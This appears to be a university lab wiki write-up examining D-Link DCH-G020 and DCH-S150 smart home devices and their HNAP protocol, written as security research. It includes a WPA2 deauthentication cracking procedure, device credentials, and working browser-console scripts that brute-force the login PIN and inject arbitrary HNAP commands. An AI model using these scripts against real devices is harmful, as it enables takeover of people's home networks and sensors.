Examination of mydlink™ home devices

From Embedded Lab Vienna for IoT & Security
Revision as of 12:55, 19 June 2020 by JPDoe (talk | contribs) (Minor: Bug fixes. Finalization before returning the equipment.)
Jump to navigation Jump to search

Summary

mydlink home: Smarthome

Smart home devices are gaining popularity with the rise of Internet of Things (IoT) technology. With the increasing popularity of IoT technology, smart home devices have become prominent. Since those devices can be controlled and programmed remotely as a feature, the manufacturers focus on advertising the usability, the “intelligence” and the efficiency of such tools, but the security and trustworthiness of these gadgets is still questioned, in order to deserve to play a central role in modern households. This project introduces two devices of the mydlink™ home product lineup, D-Link® DCH-G020 Gateway Connected Home Hub and D-Link® DCH-S150 Home Wi-Fi Motion Sensor.

The devices in question are particularly prone to attacks through Home Network Administration Protocol (HNAP), a proprietary network protocol, which has been deprecated because of vulnerabilities to HNAP authentication. Unfortunately, HNAP is still used in some smart home devices and the exploits can cause great harm. Future work will show whether these observations are applicable to all devices in the product range. It is also planned to analyze the firmware of other devices of this product family. [1]

Background Information

D-Link® DCH-G020: Gateway Connected Home Hub

D-Link states the product is no longer available for purchase, but it is still supported. The intended use-case is that it acts as a link between a pre-existing home network and one or more mydlink™ home Z-Wave and Wi-Fi devices. Customers are instructed to connect the hub to the Internet router and download the mydlink™ home app to their smartphones. The app is required and there is no other possibility to setup the device. After the initial setup one can manage the device through the app by setting up rules which are applied following different actions, e.g. sending out a notification after a motion sensor is triggered. In this inspection the hub was used as a link between the home network and a motion sensor.

D-Link® DCH-S150: Home Wi-Fi Motion Sensor

This product is also no longer available for purchase, but still supported. The setup process works similar as with the hub. One is instructed to setup and manage the device via the app. The connection to the home network is made possible via Wi-Fi Protected Setup (WPS), which is network security standard which allows to create a new network or to add devices to an existing network without entering the default Wifi password (e.g WPA2-PSK). These features also allow home users who have little knowledge of wireless networks to bypass considering and handling security options. To make use of the automated integration one must push the WPS-button on the access point as well as the client device. Shortly after the devices enter a discovery mode, which disables itself after a connection is made. The intended use-case for the motion sensor is to receive push-notifications via the app on a smart phone whenever motion is detected, or to combine it with other smart devices to enable automation, such as switching on the light when returning home.

Uninvestigated devices

Additional potentially vulnerable devices from the mydlink™ Home product line

D-Link® DCH-S160: Home Wi-Fi Water Sensor

Wherever you are, be alerted when a leak is detected in your home with the mydlink™ Home Water Sensor. It’s easy to setup, connects to your home Wi-Fi and can help you detect water leaks before serious flooding occurs.


D-Link® DCH-S220: Home Wi-Fi Siren

The mydlink™ Home Siren is a smart audio warning device with 6 different sounds built-in. It’s easy to setup, connects to your home Wi-Fi and provides instant audio alerts. It works with other mydlink Home sensors, such as the Motion Sensors, Door & Window Sensor and Monitors, to provide a loud audio warning when motion/sound is detected or a door is opened. Whether you are at home or away, push notifications will alert you whenever the Siren is activated. mydlink Home enables you to create a smart home without complicated set up, installation costs or monthly subscription charges.


D-Link® DCH-Z110: Home Door/Window Sensor

The mydlink™ Home Door/Window Sensor is a contact sensor that detects when a door or window is opened or closed, providing you with a trigger for automating your home. Integrating with D-Link’s HNAP protocol, the Door/Window Sensor connects seamlessly with your the connected home hub, guaranteeing compatibility and getting your smart home network up and running right away.


D-Link® DCH-Z120: Home Battery Motion Sensor

The mydlink™ Home Motion Sensordetects motion within its field of view, providing you with a trigger for automating your home. Integrating with D-Link’s HNAP protocol, the Motion Sensor connects seamlessly with your Connected Home Hub, guaranteeing compatibility and getting your smart home network up and running right away.


D-Link® DCH-Z310: Home Smoke Detector

Protect your home and loved ones with the mydlink™ Home Smoke Detector. A built-in audio alarm alerts you whenever smoke is detected and sends a push notification to your smartphone or tablet when you’re away from home. mydlink Home enables you to create a smart home without complicated set up, installation costs or monthly subscription charges.


D-Link® DCH-Z510: Home Siren with optional battery back-up

The mydlink Home Siren is a smart audio warning device with 6 different sounds built-in. It’s easy to set up and manage with the mydlink Home app, and connects to your router via the mydlink Home - Connected Home Hub.


D-Link® DCS-935L: Home Monitor HD

The mydlink™ Home Monitor HD allows you to monitor your home, whenever, from wherever. See everything in full colour high definition 720p with sound. The built-in night vision allows you to see up to 5 metres even in complete darkness. It’s easy to setup, connects to your home Wi-Fi and can even alert you when motion or sound is detected. What’s more, it works with other mydlink™ Home smart devices to enable you to create a smart home without complicated setup, installation cost or monthly subscription


D-Link® DCS-5010L: Home Monitor 360

The mydlink™ Home Monitor 360 allows you to monitor your home, whenever, from wherever. Not only does it pan and tilt to cover wider areas, the built-in night vision allows you to see up to 8 metres even in complete darkness. It’s easy to setup, connects to your home Wi-Fi and can even alert you when motion is detected. What’s more, it works with other mydlink™ Home smart devices to enable you to create a smart home without complicated setup, installation cost or monthly subscription charges.

Home Network Administration Protocol (HNAP)

On the myDLink product website one can find the following information: “Integrated with D-Link’s HNAP protocol, this secure, high performing Hub is perfect for all of your mydlink™ Home devices[2]. Since proprietary HNAP is a relatively unknown protocol, this project first introduces HNAP and discusses its development and characteristics. The patent application for HNAP was filed in 2007 by company called Pure Networks, Inc.[3], which at that time provided networking software and services to home networking, small businesses, original equipment manufacturers, and broadband and Internet service providers. In 2008, Cisco bought Pure Networks, Inc. and therefore acquired HNAP and integrated it in a software product called Network Magic [4].

HNAP is a network device management protocol, that allows network devices to be silently managed and administered. HNAP is based on SOAP. Before SOAP Version 1.2, SOAP was the abbreviation for Simple Object Access Protocol. Since Version 1.2 that acronym was removed, because it was misleading. SOAP isn’t exclusively used for accessing objects, and the access per se cannot be described as “simple” or “easy”. Meanwhile SOAP stands for itself, an Extensible Markup Language (XML)-based protocol used for communication between distributed applications. HNAP was designed to be a simple, light weight protocol that is easy to implement inside of small cost-constrained hardware such as the devices used in this examination. Cisco promised three high level benefits to vendors for implementing HNAP in a network device [5]:

  1. Accurate topology discovery: A network device can accurately describe itself to applications that support HNAP and show detailed information about the device.
  2. Custom task extensibility: For example, when a device with HNAP support is selected in an application, tasks related to that device can be displayed.
  3. Programmable API: The full programmable API suite allows devices’ network connections to be remotely managed and administered.

The participants in any HNAP interaction define the two roles – an HNAP server and an HNAP client. HNAP servers are typically implemented inside of networking devices to be managed. HNAP clients are usually software applications residing on PCs or other devices that can interact with an HNAP server in order to manage it, and ultimately, the device. [6] In the case of the myDLink product family, the smartphone app takes a client role, while the DCH-G020 Home Hub takes both roles. A typical client server interaction begins when a client has discovered an HNAP server on a network. It issues an HNAP discovery command in order to determine the capabilities of the device. A client then proceeds to make one or more HNAP requests to the server, which performs the desired action and returns the response.

One can simply query all supported HNAP actions from a device by requesting the URL http://$DEVICE_IP/HNAP1/ from a web client. Since HNAP is encapsulated in HTTP, it is also the best way to determine if a device is HNAP-enabled since such devices need to reply to this request. In case of the DCH-S150 Motion Sensor the output of that link is listed below. There may be more or less SOAPactions available depending on the devices' configuration.

ⓘ http://DCH-S150/HNAP1/
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
			<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
			<Type>ConnectedHomeClient</Type>
			<DeviceName>MotionSensorDLink</DeviceName>
			<VendorName>D-Link</VendorName>
			<ModelDescription>D-Link Motion Detector</ModelDescription>
			<ModelName>DCH-S150</ModelName>
			<DeviceMacId>C4:12:F5:1C:8E:4C</DeviceMacId>
			<FirmwareVersion>1.23</FirmwareVersion>
			<FirmwareRegion>Default</FirmwareRegion>
			<LatestFirmwareVersion/>
			<HardwareVersion>A1</HardwareVersion>
			<HNAPVersion>0124</HNAPVersion>
			<PresentationURL>http://dch.local</PresentationURL>
			<CAPTCHA></nowiki><b style="color: lightblue">false</b><nowiki></CAPTCHA>
			<ModuleTypes>
				<string>Motion Sensor</string>
			</ModuleTypes>
			<SOAPActions>
				<string>http://purenetworks.com/HNAP1/Reboot</string>
				<string>http://purenetworks.com/HNAP1/SetFactoryDefault</string>
				<string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
				<string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
				<string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
				<string>http://purenetworks.com/HNAP1/GetDeviceSettings2</string>
				<string>http://purenetworks.com/HNAP1/SetDeviceSettings2</string>
				<string>http://purenetworks.com/HNAP1/GetGroupSettings</string>
				<string>http://purenetworks.com/HNAP1/SetGroupSettings</string>
				<string>http://purenetworks.com/HNAP1/GetSystemLogs</string>
				<string>http://purenetworks.com/HNAP1/CleanSystemLogs</string>
				<string>http://purenetworks.com/HNAP1/GetModuleSchedule</string>
				<string>http://purenetworks.com/HNAP1/SetModuleSchedule</string>
				<string>http://purenetworks.com/HNAP1/GetModuleEnabled</string>
				<string>http://purenetworks.com/HNAP1/SetModuleEnabled</string>
				<string>http://purenetworks.com/HNAP1/GetModuleProfile</string>
				<string>http://purenetworks.com/HNAP1/SetModuleProfile</string>
				<string>http://purenetworks.com/HNAP1/GetModuleSOAPActions</string>
				<string>http://purenetworks.com/HNAP1/GetTimeSettings</string>
				<string>http://purenetworks.com/HNAP1/SetTimeSettings</string>
				<string>http://purenetworks.com/HNAP1/GetModuleGroup</string>
				<string>http://purenetworks.com/HNAP1/SetModuleGroup</string>
				<string>http://purenetworks.com/HNAP1/GetScheduleSettings</string>
				<string>http://purenetworks.com/HNAP1/SetScheduleSettings</string>
				<string>http://purenetworks.com/HNAP1/GetRecursiveSchedule</string>
				<string>http://purenetworks.com/HNAP1/SetRecursiveSchedule</string>
				<string>http://purenetworks.com/HNAP1/GetFirmwareStatus</string>
				<string>http://purenetworks.com/HNAP1/GetFirmwareValidation</string>
				<string>http://purenetworks.com/HNAP1/StartFirmwareDownload</string>
				<string>http://purenetworks.com/HNAP1/PollingFirmwareDownload</string>
				<string>http://purenetworks.com/HNAP1/CheckNewFirmware</string>
				<string>http://purenetworks.com/HNAP1/SettriggerADIC</string>
				<string>http://purenetworks.com/HNAP1/GetInternetSettings</string>
				<string>http://purenetworks.com/HNAP1/GetCurrentInternetStatus</string>
				<string>http://purenetworks.com/HNAP1/GetWLanRadios</string>
				<string>http://purenetworks.com/HNAP1/SetTriggerWirelessSiteSurvey</string>
				<string>http://purenetworks.com/HNAP1/GetSiteSurvey</string>
				<string>http://purenetworks.com/HNAP1/SetAPClientSettings</string>
				<string>http://purenetworks.com/HNAP1/GetAPClientSettings</string>
			</SOAPActions>
			<SubDeviceURLs/>
		</GetDeviceSettingsResponse>
	</soap:Body>
</soap:Envelope>
ⓘ http://DCH-G020/HNAP1/
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
	<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
		<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
		<Type>ConnectedHomeClient</Type>
		<DeviceName>DCH-G020</DeviceName>
		<VendorName>D-Link</VendorName>
		<ModelDescription>D-Link ConnectedHome Gateway</ModelDescription>
		<ModelName>DCH-G020</ModelName>
		<DeviceMacId>C4:12:F5:1A:58:F4</DeviceMacId>
		<FirmwareVersion>1.25</FirmwareVersion>
		<FirmwareRegion>Default</FirmwareRegion>
		<LatestFirmwareVersion/>
		<HardwareVersion>A1</HardwareVersion>
		<HNAPVersion>0124</HNAPVersion>
		<PresentationURL>http://dchg.local</PresentationURL>
		<CAPTCHA>false</CAPTCHA>
		<ModuleTypes>
		<string>Gateway</string>
		</ModuleTypes>
		<SOAPActions>
			<string>http://purenetworks.com/HNAP1/Reboot</string>
			<string>http://purenetworks.com/HNAP1/SetFactoryDefault</string>
			<string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
			<string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
			<string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
			<string>http://purenetworks.com/HNAP1/GetDeviceSettings2</string>
			<string>http://purenetworks.com/HNAP1/SetDeviceSettings2</string>
			<string>http://purenetworks.com/HNAP1/GetGroupSettings</string>
			<string>http://purenetworks.com/HNAP1/SetGroupSettings</string>
			<string>http://purenetworks.com/HNAP1/GetSystemLogs</string>
			<string>http://purenetworks.com/HNAP1/CleanSystemLogs</string>
			<string>http://purenetworks.com/HNAP1/GetModuleSchedule</string>
			<string>http://purenetworks.com/HNAP1/SetModuleSchedule</string>
			<string>http://purenetworks.com/HNAP1/GetModuleEnabled</string>
			<string>http://purenetworks.com/HNAP1/SetModuleEnabled</string>
			<string>http://purenetworks.com/HNAP1/GetModuleProfile</string>
			<string>http://purenetworks.com/HNAP1/SetModuleProfile</string>
			<string>http://purenetworks.com/HNAP1/GetModuleSOAPActions</string>
			<string>http://purenetworks.com/HNAP1/GetTimeSettings</string>
			<string>http://purenetworks.com/HNAP1/SetTimeSettings</string>
			<string>http://purenetworks.com/HNAP1/GetModuleGroup</string>
			<string>http://purenetworks.com/HNAP1/SetModuleGroup</string>
			<string>http://purenetworks.com/HNAP1/GetScheduleSettings</string>
			<string>http://purenetworks.com/HNAP1/SetScheduleSettings</string>
			<string>http://purenetworks.com/HNAP1/GetRecursiveSchedule</string>
			<string>http://purenetworks.com/HNAP1/SetRecursiveSchedule</string>
			<string>http://purenetworks.com/HNAP1/GetFirmwareStatus</string>
			<string>http://purenetworks.com/HNAP1/GetFirmwareValidation</string>
			<string>http://purenetworks.com/HNAP1/StartFirmwareDownload</string>
			<string>http://purenetworks.com/HNAP1/PollingFirmwareDownload</string>
			<string>http://purenetworks.com/HNAP1/CheckNewFirmware</string>
			<string>http://purenetworks.com/HNAP1/SettriggerADIC</string>
			<string>http://purenetworks.com/HNAP1/GetInternetSettings</string>
			<string>http://purenetworks.com/HNAP1/GetCurrentInternetStatus</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadios</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadioSettings</string>
			<string>http://purenetworks.com/HNAP1/SetWLanRadioSettings</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadioSecurity</string>
			<string>http://purenetworks.com/HNAP1/SetWLanRadioSecurity</string>
		</SOAPActions>
		<SubDeviceURLs/>
		</GetDeviceSettingsResponse>
	</soap:Body>
</soap:Envelope>

Note: Network Magic was discontinued in 2012, because HNAP was abused on several occasions. It was possible to learn technical details of a device through HNAP, therefore exposing its vulnerable points for malicious attacks. [7][8][9][10]

Examination

Summary

ⓘ Collected Information
Device Model DCH-G020 DCH-S150
Manufacturer D-Link D-Link
Product Type Smart Hub Motion Sensor
Description mydlinkTM Home Connected Hub mydlinkTM Home Wi-Fi Motion Sensor
Price on Release 90 Euro 40 Euro
Release 2015 Q2 (Discontinued but supported) 2014 Q3 (Discontinued but supported)
State of Research UART, U-Boot, root, ro FS Wrote tool to exploit HNAP
Ports USB B, 2x FE N/A
Buttons WPS, Z-Wave pairing, Reset WPS, Reset
LED Status Status
Power 5V/2A (3W max.) 230V AC, 50/60Hz
WLAN 2.4GHz 802.11 b/g/n up to 300Mbit/s 2.4GHz 802.11 b/g/n
Other Z-Wave: 868.40 MHz N/A
FCC-ID KA2CHG020A1 KA2CHS150A1
System QCA953x QCA953x
Processor MIPS 24Kc V7.4 MIPS 24Kc V7.4
BogoMIPS 365.56 365.56
Memory DRAM: 64M DRAM: 32M
Storage Flash: 16MB (NOR) Flash: 8MB (NOR)
Ethernet MAC eth0 | eth1 | br0: c4:12:f5:1a:58:f4 Device 1: eth0 | eth1 | br0: c4:12:f5:1c:8e:4c
Device 2: eth0 | eth1 | br0: c4:12:f5:1c:8e:56
WLAN MAC wifi0: c4:12:f5:1a:58:f4 Device 1: wifi0: 06:12:f5:1c:8e:56
Device 2: wifi0: 06:12:f5:1c:8e:4c
WLAN SSID DCH-G020-58F4 Device 1: DCH-S150-8E56
Device 2: DCH-S150-8E4C
WLAN PSK 8482c238 None
Default IPv4 192.168.0.80/24 192.168.0.60/24
Hostname DCH-G020 DCH-S150
NET Protocols HNAP; HTTP; UPnP HNAP; HTTP
Interfaces ttyS0: console;
ath0: VAP device;
sit0: IPv6-in-IPv4
ttyACM0: USB ACM device;
ttyS0: console;
ath0 | ath1: VAP device;
sit0: IPv6-in-IPv4
Ports 80 http llighttpd 1.4.48;
49152 upnpd (UPnP 1.0)
80 http llighttpd 1.4.48
Webpage http://192.168.0.60 http://192.168.0.80/Login.html
Webaccess Admin: "139885" (unchangable) Admin: "653508" (unchangable)
Admin: "770383" (unchangable)
Root Password whatsup (brute-force) qsefthuko; (brute-force)
Other Login Pw adm | bin | deamon | nobody: None adm | bin | deamon | nobody: None
Firmware 1.00 1.06
Hardware A1 A1 (others A2, B)
Baudrate Linux: 115200 bps (8N1)
U-Boot: 115200 bps (7N1)
Linux: 115200 bps (8N1)
U-Boot: 115200 bps (7N1)
Bootdelay 3s (Any key) 3s (Any key)
U-Boot 1.1.4-LSDK-10.1.432 (Mar 17 2015) 1.1.4–LSDK-10.1.432 (Apr 8 2014)
mtdparts ath-nor0:
64k(u-boot),
64k(ART), 64k(MP),
64k(config),
64k(bootarg),
2048k(uImage),
12736k(rootfs1),
64k(log),
512k(mydlink),
512k(data1),
128k(data2),
64k(data3)
ath-nor0:
64k(u-boot),
64k(ART),64k(MP),
64k(config),
64k(log),
896k(bk_uImage),
1536k(bk_rootfs),
896k(uImage),
4032k(rootfs), 2432k@0x50000(bk_firmware),
4928k@0x2b0000(firmware),
512k@0x780000(mydlink)
Filesystem squashfs (root): version 4.0 (2009/01/31)
JFFS2 (mtd8 to /dch) version 2.2 (NAND)
squashfs (root): version 4.0 (2009/01/31)
JFFS2 (mtd11 to /dch) version 2.2 (NAND)
Image Linux kernel image (2016-06-29) Linux Kernel Image (2018-01-03)
(Backup mode Linux kernel available)
Linux 2.6.31 (Jun 29 2016)
(adminuser@adminuser-VirtualBox)
(gcc version 4.3.3 (GCC))
2.6.31 (Jan 3 2018)
(root@minlee-Mint17)
(gcc version 4.3.3 (GCC))
Kernel cmdline console=ttyS0,115200 init=/sbin/init
root=31:6 rootfstype=squashfs
mtdparts=${mtdparts}
console=ttyS0,115200 init=/sbin/init
root=31:8 rootfstype=squashfs
mtdparts=${mtdparts} mem=32M
Shell sh / ash sh / ash
BusyBox v1.21.1–LSDK-10.2 (2016-06-29) v1.21.1–LSDK (2018-01-03)
Services lighttpd/1.4.34;
hostapd v2.0-devel;
udhcpc (v1.21.1);
control_center;
app_center;
lan_center;
wifi_center;
dchc_center;
zw_meter_check;
zw_center (/dev/ttyACM0)
lighttpd/1.4.48;
hostapd v2.0-devel;
control_center;
lan_center;
wifi_center;
dchc_center;
nf_conntrack version 0.5.0

Online

WLAN

To successfully compromise the MyDlink Home product line using HNAP or any other TCP/IP-based attack, it is necessary to gain access to WLAN the devices are operating in. The basis of the method used in this examination lies in capturing of the WPA/WPA2 authentication handshake and then cracking the Pre-Shared Key (PSK). Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) are security protocols to secure wireless networks. While WPA/WPA2 superseded the previous flawed system Wired Equivalent Privacy (WEP), WPA has also its security issues. It remains vulnerable to Brute Force attacks of weak passphrases. Whenn initially configuring the devices, the DCH-S150 Motion Sensor exposes an unsecured WLAN with access to the device. This WLAN network will be switched of, once the device is setup using the App and subsequently paired with the DCH-G020 Home Hub, while that device keeps its AP up and running the whole time.

Note: The HNAP API may be used to setup the device manually without using the corrensponding APP by configuring the DCH-S150 Motion Sensor using the HNAP1 SetAPClientSettings method.

Deauthentication Attack

The attack in this examination was carried out using the tool aircrack-ng. Since the setup was already in a working condition, the client, in this case the motion sensor, was forced to deauthenticate from the access point, in this case being the hub. The goal is to force the motion sensor to no longer associate with the access point and ultimately causing reauthentication using aireplay-ng. Furthermore, it is possible to capture the new authentication handshake. Through this WPA/WPA2-PSK was obtained and using John the Ripper or Hashcat it was attempted to crack the password with a suitable word list. More about this process can be found in the article WPA/WPA2 PSK deauthentication attack.

Network Mapper

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
PORT      STATE SERVICE VERSION
80/tcp    open  http    lighttpd 1.4.34
|_http-server-header: lighttpd/1.4.34
|_http-title: 400 - Bad Request

49152/tcp open  upnp    Cisco-Linksys E4200 WAP upnpd (UPnP 1.0)

MAC Address: C4:12:F5:1A:58:F4 (D-Link International)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Service Info: CPE: cpe:/h:cisco:e4200
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor
80/tcp    open     http    lighttpd 1.4.48
|_http-server-header: lighttpd/1.4.48
|_http-title: Site doesn't have a title (text/html).

MAC Address: C4:12:F5:1C:8E:4C (D-Link International)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36

Web Interface

A compressed copy of the DCH-G020 Home Hub client-side webpage can be found here. And a compressed copy of the DCH-S150 Motion Sensor client-side webpage can be found here. The website does have authentication options using challenge-response mechanisms. The webpage it self provides no functionalities besides authentication and displaying some few device information. It is very interesting, that it is not possible to change any configuration of the device in the web interface at all. Legitimate users can’t manage their devices through the web interface. Since the device can be managed through HNAP actions, the next logical step was to forge HNAP messages to manipulate the device.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor

Brute-Force Pin

To attack the web interface pin, access to the wireless network of the devices is necessary. From this point forward, this examination proceeds on the assumption that access was gained to network. The employed password for the web interface is a numeric 6-char Pin which is hardcoded with the device, leading to a keyspace of only 107-1 possible password within ^[0-9]{6}$.

Note: This password is used with the web interface login form and also for authentication within HNNAP actions from the corresponding mobile application. Thus it is used for manual execution of HNAP actions in further steps.

Requesting the web page of the device with the assigned IP address in a browser yields a login form with pre-filled username “Admin”. One can view the Login.html and its association JavaScript files (.js), which are AES.js, hmac_md5.js and soapclient.js. The latter confirms that the motion sensor uses SOAP protocol. Each of these script files has proven useful and have been used to provide the basic functionality for injecting SOAP actions. Upon further investigating the HTTP service do_login() function was discovered. This method is called upon clicking the Login button. It loads the input parameters of User Name and Password and verifies the authentication of said parameters. Using this method, a script was written to brute force the 6-digit pin of the web interface. This Script completely uses existing functions provided by the device but specialised tools like THC-Hydra may also be used. In order to execute the stcript, launch the the web browsers console within its developer tools. By copy pasting the below script to the console, the send_login_cmd_result() function will be overridden. From initially alerting the user if the login was unsuccessful to trying the next possible password on failure. In order to use existing code, the new password to try is simply written into the corresponding HTML input field. Additionally, this input field is switched from type='password' to type='text' for better BF progress visualisation.

ⓘ Brute-Force_Pin.inject.js

For execution this code must be injected into the client-side mydlink web page via the browser console.

// Use timer
//27s per 100 tries; estimated max: 3.1days; Avg: 1.55days
//20s per 100 tries with 4 web "threads"; estimated max: 2.3days; Avg: 1.15days
var t0 = performance.now();

// Example Pins
// DCH-S150: 653508
// DCH-G020: 139885
let PIN = 0, MAX = 999999;

// Override embedded function
function send_login_cmd_result ( http_req ) {
    // Parse response from login action to XML
    $xml = $( $.parseXML( http_req.responseText ) );

    // Check if login attempt was successful
    if( $xml.find( LOGIN + "Result" ).text() == "success" )
    {
        // Stop timer
        var t1 = performance.now();
        // Display valid password and time
        alert( "PIN: " + PIN + '\n' + "Time: " + (t1-t0)/1000 +  "s.");
    }
    // Increment PIN if not reached MAX
    else if ( ++PIN <= MAX )
    {
        // Try next PIN
        bfPIN();
    }
}

// Added function to set new PIN and trigger login process
function bfPIN ()
{
    // Save (String)PIN
    sPIN = ("000000"+PIN).substr(("000000"+PIN).length-6)
    // Set sPIN to #user_pwd input field
    $("#user_pwd").val(sPIN);
    // Trigger login process
    do_login();
}

// Replace input fields from type password with type text for visibility and progress insights
$('body')
   .find('input:password')
   .each( function() {
      $("<input type='text' />")
         .attr({ id: this.id, name: this.name, value: this.value })
         .insertBefore(this);
   })
   .remove();

// Start all the above
bfPIN();
ⓘ Brute-Force_Pin.inject.min.js
let PIN = 0, MAX = 999999;

//Override embedded function
function send_login_cmd_result (http_req) {
    $xml = $($.parseXML(http_req.responseText));
    if(http_req && $xml.find(LOGIN + "Result").text() == "success"){
        alert(PIN);
    } else if ( ++PIN <= MAX ) {
        $("#user_pwd").val(("000000"+PIN).substr(("000000"+PIN).length-6));
        do_login();
    }
}

// Start bruteforcing PIN
send_login_cmd_result({"responseText": null});

Note: It is important to mention, that the do_login() method has not been changed in any way for this attack. The only method that has been altered is the send_login_cmd_result() to bypass the “Password wrong”-notifications, resulting in a more time-efficient and simple brute force attack using existing code.

Note: The login process can be analyzed using Wireshark or similar tools

It is possible to attempt 100 tries in 20 seconds while executing the script four times in parallel. Unfortunately the motion sensor couldn’t handle more than four “threads”, attempts were skipped and the whole process became slower. With 1 million different combinations the expected value of tries in a successful brute force attack amounts to 500,000 on average. Therefore, it is estimated that one can crack the pin in ca. 1.15 days on average with a maximum of ca. 2.3 days.

ⓘ Proof-of-Concept

After authentication and redirection, one is presented with the content of http://$IP/version.txt as shown above. It is possible to extract a lot of information about the device, such as the firmware installed on it, the kernel, the MAC address and several drivers among other things.

Execute SOAP Actions

The first thing examined was the devices resistance against replay attacks. None of the attempts worked, so it can be concluded that HNAP security is mindful of attacks of this kind. As a result, the web interface was investigated in detail to learn about the employed communication process as also for brute-forcing the PIN. It was learned that login is basically also an HNAP action, which after being enforced successfully enables a session. All the actions listed in the result of the <code http://$IP/HNAP1 are executable based on the established keys and authentication values. It is necessary to accentuate that absolutely no keys or values were forged in this examination to prosperously execute an HNAP action within a once established session. Neither was it necessary to write any kind of script or use a separate SOAP client for the task. The class SoapClient which is already provided by the webpage, was used to carry out the attack. The only thing which was altered was the send_login_cmd_result() function, to allow for executing self-composed actions. This function calls an injected function called send_custom_cmd(). Therefore it is called when a successful login occurs. The second function which was added is the send_custom_cmd_result(), which acts as a listener and is being called whenever a response is received. Through these minor changes the established session can be exploited to enforce any HNAP action. Fig.14 shows the execution of HNAP action GetDeviceSettings, which represents an action where it’s not needed to set any parameters in the HNAP_PARAM field, since it’s a “get”-method. Fig.15 shows the execution of SetAPClientSettings, where parameters have been set, to reconfigure the clients’ access point settings.

ⓘ execute_SOAPaction.inject.js

For execution this code must be injected into the client-side mydlink web page via the browser console.

var HNAP_ACTION  = "GetDeviceSettings";
var HNAP_PARAM   = "";

var PIN = "653508";

function send_custom_cmd(){
    var client = new SoapClient();
    var user_pwd   = document.getElementById("user_pwd").value;
    var challenge  = localStorage.getItem("Challenge");
    var privateKey = localStorage.getItem("PrivateKey");
    var login_pwd  = hex_hmac_md5(privateKey, challenge);

    client.sendRequest(HNAP_ACTION, HNAP_PARAM, send_custom_cmd_result, true);
}

function send_custom_cmd_result(http_req){
    console.log(http_req.responseText);
}

function send_login_cmd_result(http_req){
	var xmlDoc = $.parseXML(http_req.responseText);
console.log("Login: "+$(xmlDoc).find(LOGIN + "Result").text());
send_custom_cmd();
}

$("#user_pwd").val(PIN);

localStorage.setItem("PrivateKey", "");
localStorage.setItem("PublicKey", "");
localStorage.setItem("Challenge", "");

console.clear();
ⓘ More complex SOAP action
var WLAN_PASSWORD =     AES_Encrypt128("8482c238"); //Needs: localStorage.getItem('PrivateKey')

var HNAP_ACTION   = 	"SetAPClientSettings";
var HNAP_PARAM    = 	"<RadioID>RADIO_2.4GHz</RadioID>"+
			"<Enabled>true</Enabled>"+
			"<SSID>DCH-G020-58F4</SSID>"+
			"<MacAddress>c4:12:f5:1a:58:f4</MacAddress>"+
			"<ChannelWidth>1</ChannelWidth>"+
			"<SupportedSecurity>"+
				"<SecurityInfo>"+
					"<SecurityType>WPA2-PSK</SecurityType>"+
				      	"<Encryptions><string>AES</string></Encryptions>"+
				"</SecurityInfo>"+
			"</SupportedSecurity>"+
			"<Key>"+WLAN_PASSWORD+"</Key>";

HNAP0wn

HNAP0wn is a graphical tool that allows us to find devices that use the Home Network Administration Protocol (HNAP) (File:HNAP Protocol.pdf), collect information about them, and inject commands. Additionally it contains a method to brute-force the PIN of mydlink devices as mentioned above. More about this tool can be found in the article HNAP0wn: The Home Network Administration Protocol Owner.

Offline

In order to gain a better understanding of how the sensor works and responds to incoming commands, the examination began with the physical opening of the motion sensor with the intention of gaining backdoor access through a Universal Asynchronous Transmitter and Receiver (UART) Serial interface which can be found on many embedded devices.

Preliminary examination: Many embedded devices are difficult to disassemble physically. Either it is an ingenious construction consisting of many small individual parts that do not like to be separated from each other, or it is a simple clipping system which is still very difficult to open without damaging the enclosure. In any case, it is worth taking a look at the database of the Federal Communications Commission (FCC) first, before venturing into the hardware. The FCC Regulation Database contains useful information about all devices approved by the FCC for the American market. The FCC ID is a unique alphanumeric code that is usually found on the product label, packaging, or online. It is the product ID assigned by the FCC to identify products in the market. The FCC chooses 3 or 5 character Grantee codes to identify the business that created the product. For example, the grantee code for FCC ID: KA2CHG020A1 is KA2. The remaining characters of the FCC ID, CHG020A1, are often associated with the product model, but they can be random. These letters are chosen by the applicant. Information accessible by FCC ID or by using this alternative client: Test Setup Photos, Test Report, Cover Letter(s), RF Exposure Info, Users Manual, ID Label/Location Info, Internal Photos, External Photos, Operational Description, Schematics and/or Block Diagram.

These Documents must be submitted by the manufacturer for certification of a device and are accessible to the end-user. The internal photos are of great interest, as they can provide information on whether On-Chip Debug (OCD) interfaces like the UART are available or not. However, this decision is based on experience, and it is never possible to tell whether OCD interfaces are available by just looking at a photo of the board and can only be done by physical intervention, which will be explained in the next section. Additional regional databases of regulatory organizations may also be useful since not every device has FCC approval.

